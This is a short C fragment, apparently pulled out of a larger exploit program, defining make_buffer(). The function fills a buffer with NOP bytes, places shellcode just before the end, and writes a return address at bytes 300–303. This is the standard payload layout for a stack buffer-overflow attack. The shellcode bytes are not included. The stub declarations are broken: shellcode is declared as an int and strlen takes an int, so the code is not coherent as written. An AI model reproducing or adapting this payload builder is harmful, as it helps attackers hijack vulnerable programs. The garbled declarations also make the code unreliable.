
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int BUFFERSIZE ;
 int NOP ;
 char* buffer ;
 int memcpy (char*,int ,int) ;
 int memset (char*,int ,int) ;
 int shellcode ;
 int strlen (int ) ;

int make_buffer(unsigned long ret)
{







   char l = (ret & 0x000000ff);
   char a = (ret & 0x0000ff00) >> 8;
   char m = (ret & 0x00ff0000) >> 16;
   char e = (ret & 0xff000000) >> 24;

memset(buffer,NOP,BUFFERSIZE);
memcpy(&buffer[BUFFERSIZE-4-strlen(shellcode)],shellcode,strlen(shellcode));
buffer[300] = l;
buffer[301] = a;
buffer[302] = m;
buffer[303] = e;
return(0);
}
